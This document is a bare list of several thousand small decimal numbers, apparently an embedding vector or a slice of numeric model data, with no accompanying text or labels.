0.0007825677166692913, -0.0023107752203941345, 0.002565729431807995, 0.0009677130146883428, -0.01678650826215744, 0.004216861445456743, -0.00046083980123512447, 0.00027518864953890443, 0.011881674639880657, 0.01645466312766075, -0.01545912679284811, 0.002076055621728301, 0.020169708877801895, -0.0032941699028015137, -0.01650322414934635, 0.017854886129498482, -0.009753009304404259, -0.00041935915942303836, -0.004929114133119583, 0.015515782870352268, -0.03096681647002697, 0.024928852915763855, 0.004528472200036049, 0.01595284789800644, -0.0020305279176682234, -0.009437351487576962, -0.008360878564417362, -0.0013253571232780814, -0.01851857639849186, 0.00841753464192152, -0.0043463618494570255, 0.01720738410949707, -0.008243518881499767, -0.00018400711996946484, 0.009874416515231133, -0.000427200022386387, -0.03431764245033264, 0.005649460945278406, 0.012343020178377628, 0.006766403093934059, 0.0034236705396324396, -0.0030614736024290323, -0.000810895930044353, -0.028554867953062057, 0.03258557245135307, 0.027972117066383362, 0.003480327082797885, 0.0031889507081359625, 0.01476306188851595, 0.006916138343513012, 0.006721887271851301, -0.031096316874027252, 0.02444322593510151, -0.0023512442130595446, 0.009340226650238037, 0.003937625791877508, 0.011137045919895172, 0.017191195860505104, 0.007563640829175711, -0.004354455508291721, -0.015750503167510033, 0.014406935311853886, -0.013670400716364384, 0.014609279111027718, -0.01856713928282261, -0.00792786106467247, -0.0025050260592252016, 0.015604814514517784, -0.017077883705496788, -0.008283987641334534, 0.007009216584265232, -0.000941408216021955, 0.024831729009747505, 0.012691052630543709, 0.008474191650748253, 0.007931907661259174, -0.002759980270639062, -0.005151693243533373, -0.0001618756796233356, -0.0014801507350057364, 0.0037514688447117805, -0.0001526436972199008, -0.013581369072198868, -0.016284693032503128, -0.0023370799608528614, 0.005847758613526821, 0.01264248974621296, -0.012893397361040115, -0.0035106786526739597, 0.012391583062708378, -0.02233884297311306, -0.0033144045155495405, -0.02452416531741619, -0.003284052712842822, 0.002543471520766616, 0.013880838640034199, -0.017563510686159134, 0.0058153835125267506, -0.0011958564864471555, 0.010716169141232967, -0.004977677017450333, -0.006062244065105915, 0.006390042137354612, -0.0021752044558525085, -0.03444714471697807, 0.011897861957550049, -0.039530038833618164, -0.005297381430864334, 0.005730398930609226, -0.009663977660238743, -0.007061826065182686, -0.01743401028215885, -0.011072295717895031, 0.0013587439898401499, 0.013977964408695698, -0.0025293075013905764, -0.013670400716364384, 0.0023330331314355135, 0.0037757500540465117, -0.001772538642399013, 0.011744080111384392, 0.02811780385673046, 0.014479778707027435, -0.000898409984074533, 0.014730686321854591, 0.004949348513036966, 0.007454374805092812, -0.011234171688556671, -0.03265032172203064, 0.011250359006226063, -0.0040853372775018215, -0.01009294856339693, 0.019829770550131798, -0.015475314110517502, 0.013128116726875305, -0.024378476664423943, -0.005665648728609085, 0.017984386533498764, 0.005564476363360882, -0.002519190078601241, -0.010619044303894043, -0.0256087314337492, -0.021060025319457054, 0.002084149280562997, -0.0038425237871706486, 0.00783478282392025, -0.0007233819342218339, -0.02844155579805374, -0.02060677297413349, -0.01856713928282261, 0.011574110947549343, 0.00007764973997836933, -0.003085755044594407, -0.010521918535232544, -0.003413553349673748, -0.012577739544212818, 0.004532518796622753, -0.010716169141232967, 0.010716169141232967, -0.014568810351192951, 0.023439597338438034, -0.005613038782030344, -0.017013132572174072, -0.005896321497857571, 0.010813294909894466, 0.034155767410993576, 0.011161327362060547, -0.033605389297008514, -0.013144304975867271, 0.021723715588450432, -0.03674577921628952, 0.009089319035410881, -0.010926607996225357, 0.013589463196694851, 0.01196261215955019, 0.02065533585846424, -0.0035167490132153034, 0.008352784439921379, -0.018664265051484108, -0.0005883168778382242, 0.008101877756416798, -0.004872457589954138, 0.002826754003763199, -0.00482794176787138, -0.004233048763126135, -0.004775332286953926, 0.00152972515206784, 0.0019799417350441217, -0.009154069237411022, -0.0006495261332020164, 0.007393671199679375, 0.01235920749604702, 0.00811806507408619, 0.004860317334532738, 0.02462128922343254, -0.027599802240729332, 0.0064993081614375114, -0.01184120588004589, 0.0053823660127818584, 0.016195660457015038, -0.0058760871179401875, 0.011768361553549767, 0.0047429571859538555, -0.015960941091179848, -0.0004535048210527748, 0.013006710447371006, -0.011112765409052372, 0.012512989342212677, -0.006810918916016817, 0.014334090985357761, 0.014204590581357479, 0.001753315911628306, 0.016252318397164345, -0.008251612074673176, -0.0037939611356705427, -0.041116420179605484, -0.010691888630390167, 0.0024443226866424084, 0.012092112563550472, 0.009315945208072662, 0.009995822794735432, 0.0003892604145221412, 0.011298921890556812, 0.010918513871729374, 0.0026851126458495855, -0.00390727398917079, -0.0011341414647176862, 0.011290828697383404, 0.014002245850861073, -0.011695517227053642, 0.020396335050463676, 0.004152111243456602, 0.024961229413747787, -0.010748544707894325, -0.000612598261795938, 0.01767682284116745, -0.008927443064749241, -0.025705857202410698, 0.002128665102645755, -0.007353202439844608, -0.0026426203548908234, -0.010902326554059982, 0.0035592413041740656, -0.008045220747590065, -0.006106759887188673, -0.009623508900403976, -0.007405811920762062, -0.009315945208072662, -0.016389911994338036, 0.0015570416580885649, -0.017385447397828102, 0.0034095062874257565, -0.013840369880199432, -0.005961071699857712, -0.04127829521894455, 0.005625179503113031, 0.01642228662967682, -0.007361296098679304, -0.00473486352711916, -0.02565729431807995, -0.0023795724846422672, 0.004892692435532808, -0.005839664954692125, -0.01445549726486206, 0.016349442303180695, 0.011574110947549343, -0.0015216313768178225, -0.007353202439844608, -0.0051840683445334435, 0.023261534050107002, 0.004301846027374268, 0.00345604564063251, 0.0038243127055466175, 0.017239758744835854, 0.012771991081535816, 0.010343855246901512, -0.035191770642995834, 0.005981306079775095, -0.003970000892877579, 0.001447775517590344, 0.018259575590491295, -0.007045638747513294, -0.030578315258026123, -0.02219315432012081, -0.01224589440971613, -0.010675700381398201, -0.008065455593168736, 0.00498981773853302, 0.009429258294403553, 0.03713427856564522, 0.0062564946711063385, 0.018907079473137856, -0.010521918535232544, -0.00002858117295545526, 0.0022682829294353724, 0.0058639463968575, -0.011307016015052795, -0.006636902689933777, 0.006309104152023792, -0.004439440555870533, -0.0021529465448111296, -0.0034095062874257565, -0.008757473900914192, -0.01790344901382923, -0.01116942148655653, -0.004050938878208399, 0.011501266621053219, -0.026612360030412674, 0.023245347663760185, -0.019845956936478615, 0.000701124023180455, 0.007790267001837492, 0.006345526315271854, 0.013646119274199009, 0.010748544707894325, -0.014139840379357338, -0.0043180338107049465, 0.011104671284556389, 0.009801572188735008, 0.017693011090159416, 0.007280358579009771, 0.010222448967397213, -0.0036401792895048857, 0.025252604857087135, 0.0165517870336771, 0.002009281888604164, -0.010109135881066322, -0.009056944400072098, 0.002458486706018448, -0.007826688699424267, -0.0010643325513228774, 0.016567975282669067, 0.01093470212072134, 0.007454374805092812, -0.005285240709781647, 0.01822720095515251, -0.025171667337417603, -0.007292499300092459, 0.007608156651258469, 0.007583875209093094, -0.013047179207205772, 0.006782590877264738, 0.003223349340260029, -0.012537270784378052, 0.002084149280562997, 0.0017401635413989425, 0.00806950218975544, 0.022727344185113907, -0.009550664573907852, -0.013484243303537369, 0.0096963532269001, 0.013451868668198586, -0.009485914371907711, 0.007296545896679163, 0.0036685075610876083, 0.00011242771142860875, 0.005200256127864122, -0.004427299834787846, -0.007126576732844114, 0.010627138428390026, -0.003972024191170931, -0.00015871404320932925, 0.003245607251301408, 0.02685517445206642, 0.012440145947039127, -0.001821101293899119, 0.012456333264708519, 0.012820553034543991, -0.006669277790933847, -0.0043746898882091045, 0.010303386487066746, -0.014779249206185341, 0.0032273961696773767, 0.00210438366048038, 0.020962899550795555, -0.038170285522937775, 0.011671235784888268, 0.0006991005502641201, 0.007968329824507236, 0.023148221895098686, 0.008126159198582172, 0.005475444719195366, -0.011663142591714859, 0.007733610458672047, -0.011970706284046173, 0.01056238729506731, -0.021529464051127434, 0.015078718774020672, -0.012958147563040257, -0.02434610202908516, -0.0016895773587748408, 0.0033164278138428926, -0.030934441834688187, 0.003874898888170719, 0.006636902689933777, -0.007992611266672611, -0.030724002048373222, 0.01144461054354906, 0.01112085860222578, 0.01005247887223959, 0.008749379776418209, 0.01399415172636509, -0.001998152816668153, -0.001205973792821169, -0.0032294197008013725, -0.019052766263484955, -0.015337720513343811, 0.003199067898094654, 0.003152528777718544, 0.006062244065105915, 0.003399389097467065, 0.000054316875321092084, -0.018291950225830078, 0.012529177591204643, 0.005402600392699242, 0.02447560243308544, -0.008943631313741207, -0.004305893089622259, -0.01223780121654272, 0.014997781254351139, 0.004892692435532808, 0.0006561023183166981, -0.004366596229374409, -0.00851466041058302, 0.02499360404908657, -0.02131902612745762, -0.0030088641215115786, -0.03651915118098259, -0.0007385577773675323, -0.020396335050463676, 0.014123652130365372, 0.013225242495536804, -0.024216601625084877, 0.0003389272023923695, -0.01534581370651722, -0.01693219505250454, 0.004024634137749672, -0.035936400294303894, 0.01636563055217266, 0.017790136858820915, 0.007126576732844114, -0.009987728670239449, -0.005851805675774813, -0.0021347354631870985, -0.017320696264505386, -0.014892562292516232, 0.011315109208226204, 0.0014062948757782578, 0.004439440555870533, -0.010756638832390308, 0.015645284205675125, -0.006827106699347496, 0.014018433168530464, 0.01623613014817238, 0.010408605448901653, -0.006527636665850878, -0.010958983562886715, 0.0031403880566358566, 0.02000783383846283, 0.006588339805603027, -0.014803530648350716, 0.012019269168376923, 0.010384324006736279, 0.01450406014919281, -0.009963448159396648, -0.011072295717895031, -0.009971541352570057, 0.002065938198938966, 0.02397378720343113, 0.01231064461171627, -0.0023735021241009235, 0.0006429499480873346, -0.0000744248682167381, 0.0349651463329792, 0.016478942707180977, -0.024637477472424507, 0.005511866882443428, -0.0126829594373703, 0.01683506928384304, 0.01331427413970232, 0.005426881834864616, 0.007162998430430889, 0.014754967764019966, 0.005540194921195507, -0.005398553796112537, 0.009097413159906864, -0.021950341761112213, -0.003263818332925439, -0.012610115110874176, -0.020962899550795555, 0.015831440687179565, 0.004024634137749672, 0.01698075793683529, -0.013573274947702885, 0.0023593378718942404, -0.0009667013073340058, -0.025592543184757233, -0.02377953566610813, 0.011185608804225922, 0.0037818204145878553, -0.004921020474284887, 0.010311480611562729, -0.01991070806980133, 0.0007754856487736106, -0.010360043495893478, -0.006373854819685221, 0.013395211659371853, 0.01347615011036396, 0.003071590792387724, 0.008547035977244377, -0.01702932082116604, -0.011655048467218876, -0.011048014275729656, -0.007822642102837563, -0.031047753989696503, 0.004172345623373985, -0.000569094147067517, 0.029930811375379562, 0.012343020178377628, -0.011072295717895031, -0.0012504896149039268, 0.019376518204808235, 0.006644996348768473, -0.0003723140398506075, -0.002666901797056198, -0.0022278139367699623, -0.012950053438544273, -0.005026239436119795, 0.013654213398694992, -0.023148221895098686, -0.01494921837002039, 0.019327955320477486, -0.014868280850350857, 0.01986214518547058, 0.025802982971072197, -0.0015145492507144809, 0.002998746931552887, 0.013379024341702461, 0.025916295126080513, -0.010570481419563293, -0.00997963547706604, -0.037522781640291214, -0.025916295126080513, 0.004880551714450121, -0.0236014723777771, -0.009113600477576256, -0.013184773735702038, 0.020024020224809647, -0.017644448205828667, -0.03307120129466057, -0.023989975452423096, 0.043771181255578995, 0.013678494840860367, 0.0005513890064321458, -0.011485079303383827, 0.022031279280781746, -0.009218819439411163, 0.009356413967907429, -0.022419780492782593, -0.0018706757109612226, -0.01809770055115223, 0.008097830228507519, 0.003903227159753442, 0.004229002166539431, -0.000008496892405673862, -0.026515236124396324, 0.018130075186491013, 0.004880551714450121, -0.002913762116804719, -0.007029450964182615, 0.021658964455127716, 0.00240790075622499, -0.00721560837700963, 0.03768465667963028, 0.0027073705568909645, 0.0030776611529290676, 0.023212971165776253, 0.01636563055217266, 0.01599331572651863, 0.008360878564417362, 0.0077417041175067425, 0.002252095378935337, -0.015871910378336906, -0.019473643973469734, 0.004139970522373915, -0.005726351868361235, -0.004040821455419064, 0.015370095148682594, -0.013120023533701897, -0.015434845350682735, -0.00010053996811620891, 0.014512154273688793, 0.003990235272794962, 0.0048967390321195126, -0.0060743847861886024, -0.0018767460715025663, 0.0096963532269001, -0.004382784012705088, -0.005548288580030203, -0.004366596229374409, -0.006207932252436876, -0.005204302724450827, -0.004127829801291227, -0.022355031222105026, -0.004597268998622894, 0.0013901073252782226, -0.011096577160060406, 0.003982141613960266, 0.013532806187868118, -0.003148481948301196, 0.001050168415531516, 0.013298086822032928, -0.012788178399205208, -0.007284405175596476, -0.00398821197450161, 0.012788178399205208, 0.010926607996225357, 0.0010319574503228068, 0.011825017631053925, -0.017191195860505104, 0.018729016184806824, -0.004755097907036543, -0.0025981045328080654, 0.015661470592021942, -0.008822224102914333, -0.0314362570643425, -0.0022581657394766808, -0.012205425649881363, -0.005596851464360952, 0.015289157629013062, 0.020493460819125175, -0.005900368094444275, 0.007057779468595982, 0.011760267429053783, -0.007757891435176134, 0.011072295717895031, -0.007551500108093023, 0.011727892793715, 0.0053823660127818584, -0.015888096764683723, 0.011727892793715, 0.029509935528039932, -0.018874702975153923, 0.013694682158529758, 0.011784548871219158, -0.010481449775397778, 0.01584762893617153, -0.0009672071319073439, -0.0058760871179401875, 0.0005852817557752132, 0.001226208172738552, -0.006944466382265091, 0.0023755254223942757, 0.001182704116217792, 0.003025051672011614, -0.0024180179461836815, 0.01352471299469471, -0.010837576352059841, -0.017013132572174072, 0.003996305633336306, -0.0032719119917601347, 0.010246730409562588, 0.02365003526210785, 0.005349990911781788, 0.019376518204808235, -0.005811336915940046, 0.009178350679576397, 0.0027680739294737577, 0.0016814835835248232, 0.009226913563907146, 0.005269053392112255, 0.023148221895098686, -0.008109970949590206, 0.021837027743458748, -0.0021327119320631027, -0.032812200486660004, 0.01140414085239172, 0.0012322785332798958, -0.016398005187511444, -0.00046741601545363665, -0.016948383301496506, 0.02928330935537815, 0.011606485582888126, -0.018858516588807106, -0.006357667036354542, -0.02528497949242592, -0.0035612648352980614, 0.008409441448748112, -0.01286911591887474, 0.0063010104931890965, -0.04422443360090256, -0.002428135136142373, -0.00006664724787697196, 0.009437351487576962, -0.0033144045155495405, -0.011825017631053925, -0.0017978317337110639, -0.021885590627789497, -0.00839325413107872, -0.015531971119344234, -0.00473486352711916, 0.0031019425950944424, -0.014698310755193233, -0.009445445612072945, -0.010918513871729374, -0.004475862253457308, -0.011298921890556812, 0.020865773782134056, 0.035742148756980896, -0.018826140090823174, -0.0042654238641262054, 0.015839533880352974, -0.006139134988188744, 0.02303490787744522, 0.0018595467554405332, -0.017871074378490448, -0.017709199339151382, 0.029930811375379562, -0.00761220371350646, -0.013751338236033916, -0.0048684109933674335, 0.0054794917814433575, 0.007320827338844538, -0.015264876186847687, -0.003634108928963542, 0.00937260128557682, -0.020121145993471146, -0.012164956890046597, -0.000017025400666170754, 0.001770515227690339, 0.006644996348768473, -0.04173154756426811, 0.019198454916477203, -0.011201797053217888, 0.03399389237165451, 0.0023087516892701387, -0.0022945876698940992, -0.000004461856406123843, 0.007887392304837704, 0.007519125007092953, -0.00465392554178834, 0.0026244092732667923, -0.016899820417165756, 0.0034924675710499287, 0.001706776674836874, 0.004831988830119371, -0.01002819836139679, 0.015442939475178719, -0.02191796712577343, -0.03642202541232109, -0.008571316488087177, -0.0023512442130595446, 0.008186861872673035, 0.022031279280781746, -0.022322654724121094, -0.001753315911628306, -0.004008446354418993, 0.035515524446964264, 0.02719511277973652, -0.0004977677017450333, -0.03284457325935364, 0.016964569687843323, -0.0022257904056459665, -0.005693976767361164, -0.0027033237274736166, -0.0029886295087635517, -0.014965405687689781, 0.01711025834083557, -0.020962899550795555, 0.0017462337855249643, 0.00513145886361599, -0.013702775351703167, 0.0075272186659276485, -0.004052962176501751, 0.008797942660748959, 0.005370225291699171, 0.0015256782062351704, -0.0047874730080366135, 0.004415159113705158, -0.02662854827940464, -0.007681000512093306, 0.004929114133119583, 0.014406935311853886, -0.0008867751457728446, -0.0016238153912127018, -0.023245347663760185, -0.020574398338794708, -0.0015236547915264964, -0.003462116001173854, 0.005010052118450403, -0.011873580515384674, 0.019473643973469734, 0.010044385679066181, 0.00823137816041708, 0.004249236546456814, 0.007915720343589783, 0.018631890416145325, 0.005568522959947586, 0.006288869772106409, -0.00007676448149140924, -0.007875251583755016, 0.009048850275576115, 0.021934153512120247, -0.0031181301455944777, 0.01940889284014702, -0.0036786247510463, -0.022937782108783722, 0.0054633039981126785, -0.009202632121741772, 0.009113600477576256, 0.014722592197358608, -0.015070625580847263, -0.02531735599040985, 0.0015256782062351704, 0.03200282156467438, 0.02089815028011799, 0.015151563100516796, -0.006070337723940611, -0.014746873639523983, -0.01065951306372881, -0.013516618870198727, -0.0028550822753459215, -0.010271011851727962, -0.01445549726486206, 0.005325709469616413, -0.012043549679219723, -0.007057779468595982, -0.0137594323605299, -0.025770606473088264, 0.008806036785244942, 0.003589593106880784, 0.004831988830119371, 0.0021650870330631733, 0.012488707900047302, -0.014026527293026447, 0.0012413840740919113, 0.007243936415761709, 0.00390727398917079, 0.010432886891067028, -0.003660413669422269, 0.02298634499311447, -0.01392130833119154, 0.004407064989209175, 0.015888096764683723, -0.0013607674045488238, -0.010003916919231415, -0.014989687129855156, -0.007968329824507236, 0.013557087630033493, 0.0009641720098443329, 0.013160492293536663, 0.010360043495893478, -0.004451580811291933, -0.0053378501906991005, 0.0012535247951745987, -0.006139134988188744, -0.019748833030462265, 0.001223173108883202, -0.00048461530241183937, 0.01252108346670866, -0.004900786094367504, 0.004771285690367222, -0.0058760871179401875, 0.014584998600184917, 0.008822224102914333, -0.013403305783867836, 0.015726221725344658, 0.0023593378718942404, 0.007256077136844397, 0.007919766940176487, 0.029396621510386467, 0.011298921890556812, 0.003126224037259817, 0.020040208473801613, -0.005325709469616413, -0.015248688869178295, 0.005896321497857571, 0.021011462435126305, -0.022840658202767372, 0.011420329101383686, -0.045357562601566315, 0.003524842904880643, 0.017320696264505386, 0.01151745393872261, 0.0196355190128088, -0.0015924519393593073, -0.00443134643137455, -0.03227800875902176, -0.00465392554178834, 0.017612073570489883, -0.004168298561125994, 0.015442939475178719, -0.008636067621409893, 0.01252108346670866, 0.009793478064239025, -0.002719511277973652, 0.02099527418613434, 0.015103000216186047, -0.021998904645442963, 0.000983900623396039, 0.004500143695622683, 0.009097413159906864, -0.0004775332345161587, -0.015232500620186329, -0.003613874316215515, 0.001817054464481771, 0.02598104625940323, 0.0013729080092161894, 0.01217305101454258, -0.02447560243308544, -0.014512154273688793, -0.010432886891067028, -0.0021792512852698565, 0.018809953704476357, 0.02657998539507389, 0.005867992993444204, 0.016058066859841347, 0.0158152524381876, -0.007620297372341156, -0.005099083762615919, 0.006701652891933918, 0.0023937365040183067, 0.0004765215271618217, -0.0040671261958777905, -0.02020208351314068, -0.008207096718251705, 0.020347772166132927, -0.001399212866090238, 0.01405890192836523, 0.008328502997756004, -0.007794313598424196, 0.015880003571510315, -0.006098666228353977, -0.007025404367595911, 0.003486397210508585, -0.028943371027708054, -0.008458004333078861, 0.002082125749439001, -0.0015034202951937914, 0.026838986203074455, 0.007968329824507236, -0.010335762053728104, 0.005001958459615707, -0.006669277790933847, 0.002826754003763199, 0.007252030074596405, 0.006685465108603239, -0.002666901797056198, 0.007033498026430607, -0.000810895930044353, -0.0473971962928772, 0.025301167741417885, -0.007774079218506813, 0.003961907234042883, 0.010983264073729515, -0.006292916834354401, 0.02285684458911419, -0.007239889353513718, 0.00022725826420355588, -0.009518289938569069, 0.0015813229838386178, -0.01856713928282261, -0.016389911994338036, -0.002784261479973793, -0.005778961349278688, 0.0019040625775232911, 0.0008377066114917397, 0.006288869772106409, 0.012699146755039692, 0.009558758698403835, -0.00024142238544300199, -0.010449075140058994, -0.023569097742438316, -0.001880793017335236, 0.0158152524381876, -0.014212683774530888, -0.00041050658910535276, -0.009720634669065475, -0.02424897626042366, 0.004382784012705088, -0.011606485582888126, 0.015588627196848392, 0.0026547610759735107, -0.011493172496557236, -0.013459961861371994, -0.019943082705140114, -0.009922978468239307, 0.015151563100516796, -0.0044192057102918625, 0.009510195814073086, -0.017838699743151665, 0.02122190035879612, -0.007033498026430607, 0.003575428854674101, 0.014520247466862202, -0.03007650002837181, -0.012318738736212254, 0.02117333747446537, -0.011436516419053078, 0.009615414775907993, 0.015774784609675407, -0.002913762116804719, -0.002169134095311165, -0.013257618062198162, -0.009340226650238037, 0.010303386487066746, -0.011476985178887844, -0.022306468337774277, -0.020169708877801895, -0.009825853630900383, 0.005196209065616131, -0.00839325413107872, -0.006333385594189167, -0.007369390223175287, -0.010481449775397778, 0.008547035977244377, 0.007025404367595911, 0.006766403093934059, -0.0014518224634230137, 0.005256912671029568, -0.013888932764530182, 0.007911673747003078, 0.014010339975357056, -0.004977677017450333, -0.01021435484290123, -0.004633691161870956, -0.0056777894496917725, 0.0012960170861333609, 0.00482794176787138, 0.008146393112838268, -0.005143599584698677, -0.006017728243023157, -0.028975745663046837, -0.015281063504517078, -0.005034333560615778, 0.011072295717895031, 0.00643455795943737, 0.006547871045768261, 0.01609044149518013, -0.0068230596370995045, -0.001600545714609325, 0.0019556605257093906, 0.0018534765113145113, 0.006802825257182121, -0.009882509708404541, 0.004674159921705723, -0.009906791150569916, 0.005022192839533091, -0.013573274947702885, 0.015143468976020813, 0.010797107592225075, -0.012213519774377346, -0.0038566880393773317, -0.002365408232435584, -0.01422077789902687, -0.0014528342289850116, -0.0031889507081359625, -0.01725594699382782, 0.0024928853381425142, -0.007264170795679092, -0.009558758698403835, -0.0022622125688940287, 0.022079842165112495, -0.007377483882009983, -0.014423122629523277, -0.02070389874279499, -0.007506984286010265, 0.018550952896475792, -0.0003414564998820424, -0.012836741283535957, -0.0071468111127614975, -0.005681836046278477, -0.008385160006582737, 0.0026203624438494444, -0.0009930060477927327, -0.01641419343650341, 0.005062661599367857, -0.025819169357419014, -0.02667711116373539, 0.009510195814073086, 0.014018433168530464, 0.021286651492118835, -0.005564476363360882, 0.008822224102914333, 0.0003437328850850463, -0.014981593936681747, -0.004811754450201988, 0.014018433168530464, 0.005653508007526398, -0.013638025149703026, 0.0011240241583436728, 0.002432181965559721, 0.016721757128834724, -0.010740450583398342, -0.0128043657168746, -0.01490065548568964, -0.005038380157202482, 0.019344143569469452, 0.014633560553193092, 0.010635231621563435, -0.010505731217563152, 0.019975457340478897, -0.015094907023012638, 0.018453827127814293, -0.006721887271851301, 0.0033184513449668884, 0.014042714610695839, -0.011476985178887844, 0.005358084570616484, 0.010149604640901089, 0.010149604640901089, 0.030772564932703972, -0.006090572103857994, 0.025543982163071632, 0.00004261883077560924, 0.004751050844788551, -0.008563223294913769, 0.0047429571859538555, -0.00792786106467247, 0.01307955477386713, 0.005738492589443922, 0.007199420593678951, -0.023002533242106438, 0.004059032537043095, 0.013864651322364807, -0.005062661599367857, -0.020412523299455643, -0.025074541568756104, 0.010983264073729515, 0.004823895171284676, -0.0118492990732193, 0.006928279064595699, -0.0004145534767303616, -0.02097908779978752, -0.018113888800144196, 0.003021004842594266, 0.005281193647533655, -0.00004302984234527685, -0.010505731217563152, 0.028651993721723557, 0.005499726161360741, 0.039012037217617035, -0.011468891054391861, 0.003045286051928997, -0.005014099180698395, -0.0005635296693071723, -0.007304639555513859, -0.004322080407291651, -0.011161327362060547, -0.009178350679576397, 0.007268217857927084, 0.015645284205675125, -0.003937625791877508, -0.012043549679219723, -0.013799901120364666, -0.0045608473010361195, 0.004160204902291298, -0.004079266916960478, 0.008288034237921238, 0.011930237524211407, 0.011825017631053925, 0.0004180945106782019, 0.024362288415431976, -0.0010253812652081251, -0.010068667121231556, 0.020962899550795555, 0.009485914371907711, 0.013654213398694992, -0.006479073781520128, 0.028522493317723274, 0.018583327531814575, 0.014779249206185341, 0.010149604640901089, 0.00696065416559577, -0.009623508900403976, -0.020590586587786674, 0.012059737928211689, -0.00013923837104812264, -0.00050257338443771, 0.034155767410993576, 0.0008468120940960944, 0.0025272839702665806, 0.015370095148682594, 0.020833399146795273, 0.0033973657991737127, 0.00823137816041708, 0.013071460649371147, -0.022306468337774277, -0.001929355668835342, -0.005317615810781717, 0.022096028551459312, -0.007883345708251, -0.021108588203787804, -0.00648312084376812, -0.007774079218506813, 0.004036774393171072, 0.06374663859605789, -0.023245347663760185, -0.004500143695622683, -0.01275580283254385, 0.00797642394900322, 0.012140675447881222, -0.023536723107099533, 0.020509647205471992, -0.016211848706007004, 0.02373097464442253, 0.003524842904880643, -0.000503838062286377, 0.0033872483763843775, 0.004819848109036684, 0.005568522959947586, -0.004977677017450333, 0.028765307739377022, 0.007098248228430748, 0.002150923013687134, 0.01864807680249214, 0.01842145249247551, -0.006126994267106056, -0.00012627567048184574, 0.00821114331483841, 0.008174721151590347, 0.000982383033260703, 0.01730450987815857, -0.009833946824073792, -0.035839274525642395, 0.003245607251301408, 0.006240307353436947, 0.009226913563907146, -0.0006080454913899302, -0.014625467360019684, -0.0077255163341760635, 0.01466593611985445, -0.005754680372774601, 0.004322080407291651, 0.0006242330418899655, 0.011533642187714577, -0.027858803048729897, -0.012003080919384956, -0.017272135242819786, 0.013540900312364101, 0.007968329824507236, 0.010254823602735996, 0.004164251498878002, -0.011412234976887703, -0.01550768967717886, 0.00041581812547519803, -0.015378189273178577, 0.011994987726211548, 0.00600558752194047, -0.0071468111127614975, 0.005710164550691843, 0.016996946185827255, 0.011428422294557095, 0.0033447560854256153, 0.008304222486913204, 0.002539424691349268, 0.011865487322211266, 0.008684629574418068, -0.005090990103781223, 0.016009503975510597, 0.010432886891067028, 0.005795149132609367, -0.003000770229846239, -0.005851805675774813, -0.001597510534338653, 0.0036442261189222336, 0.008259706199169159, -0.012084019370377064, 0.005216443445533514, -0.001359755638986826, 0.012140675447881222, 0.01693219505250454, 0.005232631228864193, -0.002256142208352685, -0.020137334242463112, 0.0008594586397521198, 0.031646694988012314, -0.007822642102837563, 0.012132581323385239, 0.006875669118016958, 0.002498955698683858, 0.002424088306725025, -0.03632489964365959, 0.001315239816904068, -0.011994987726211548, 0.019036579877138138, 0.01224589440971613, -0.007397718261927366, -0.0030978957656770945, 0.0010334750404581428, 0.016867445781826973, -0.016624631360173225, -0.016705568879842758, -0.003541030455380678, 0.013354742899537086, -0.030950628221035004, -0.0008645172929391265, 0.0018787694862112403, 0.02975274808704853, 0.014075090177357197, -0.018340513110160828, 0.023763349279761314, -0.004394924733787775, 0.01856713928282261, 0.022646406665444374, -0.011792642995715141, 0.01217305101454258, -0.0008407417917624116, -0.003589593106880784, 0.005143599584698677, 0.007405811920762062, -0.018534764647483826, -0.010060572996735573, -0.019247017800807953, 0.010238636285066605, -0.010449075140058994, 0.016818882897496223, 0.009639696218073368, 0.015248688869178295, -0.0022804236505180597, -0.006373854819685221, -0.018550952896475792, 0.019004203379154205, 0.0136623065918684, -0.01275580283254385, -0.01874520257115364, 0.008668442256748676, -0.0005367190460674465, 0.013727056793868542, 0.007944048382341862, 0.0633581355214119, 0.0037575389724224806, 0.023310096934437752, -0.007895486429333687, -0.003182880347594619, 0.009801572188735008, -0.018631890416145325, -0.013565181754529476, -0.014471685513854027, -0.000525590090546757, -0.00902456883341074, -0.013613743707537651, 0.009995822794735432, -0.003569358494132757, 0.012189238332211971, 0.0024625337682664394, -0.006264588795602322, -0.0005807289853692055, -0.009356413967907429, -0.0015681706136092544, -0.00025874815764836967, 0.0011563993757590652, 0.017984386533498764, 0.0031282473355531693, 0.005649460945278406, 0.009971541352570057, 0.0036644604988396168, 0.010181980207562447, -0.009647790342569351, -0.02528497949242592, -0.00011331296991556883, -0.00818281527608633, -0.009518289938569069, 0.015038250014185905, 0.017466384917497635, 0.026142921298742294, 0.005358084570616484, 0.01958695612847805, -0.01093470212072134, -0.006564058363437653, 0.004168298561125994, -0.002035586629062891, -0.015038250014185905, -0.00031641634996049106, 0.0020244575571268797, 0.008506566286087036, 0.005058615002781153, -0.0146173732355237, 0.024686040356755257, -0.01422077789902687, -0.008000705391168594, 0.008555129170417786, -0.012059737928211689, 0.0011523524299263954, 0.009761103428900242, -0.013929401524364948, -0.013387118466198444, -0.004520378075540066, -0.014010339975357056, -0.006729980930685997, -0.005600898526608944, -0.007757891435176134, -0.007915720343589783, -0.0077700321562588215, -0.013646119274199009, -0.008927443064749241, 0.00827589351683855, 0.01995927095413208, -0.009040756151080132, -0.00026810658164322376, -0.0010542153613641858, -0.015208219178020954, 0.006139134988188744, -0.006466933060437441, -0.010942795313894749, -0.006446698680520058, 0.017741573974490166, -0.008806036785244942, 0.016673194244503975, 0.010635231621563435, -0.003458069171756506, 0.012035456486046314, -0.013281898573040962, -0.00022283197904471308, 0.02275971882045269, -0.017693011090159416, -0.012852928601205349, -0.0006424440653063357, -0.009963448159396648, 0.022694969549775124, 0.014674030244350433, 0.01026291772723198, -0.02365003526210785, 0.011792642995715141, 0.0002605186600703746, 0.006693559233099222, -0.008458004333078861, 0.00719537353143096, -0.012035456486046314, -0.0015024086460471153, -0.013289992697536945, 0.01678650826215744, -0.022921595722436905, 0.0007699211710132658, 0.0026830893475562334, -0.02821492962539196, -0.014139840379357338, -0.0070213573053479195, -0.025025978684425354, 0.021756090223789215, -0.006171510089188814, 0.011485079303383827, -0.01207592524588108, -0.0043463618494570255, -0.010279105044901371, 0.013306180015206337, -0.006742121651768684, -0.000525084207765758, -0.0013101812219247222, -0.007341061718761921, -0.00043908777297474444, 0.010853763669729233, 0.015960941091179848, 0.006147228647023439, 0.0013405329082161188, -0.0008179779979400337, -0.015281063504517078, 0.015580534003674984, -0.005916555877774954, 0.009251195006072521, 0.010036291554570198, -0.006305057555437088, 0.01926320604979992, 0.012537270784378052, 0.007515077944844961, 0.02201509103178978, 0.0014386700931936502, 0.03096681647002697, 0.01167932990938425, -0.0016369677614420652, -0.03438239172101021, 0.05069946125149727, 0.005475444719195366, 0.004649878945201635, -0.01121798437088728, 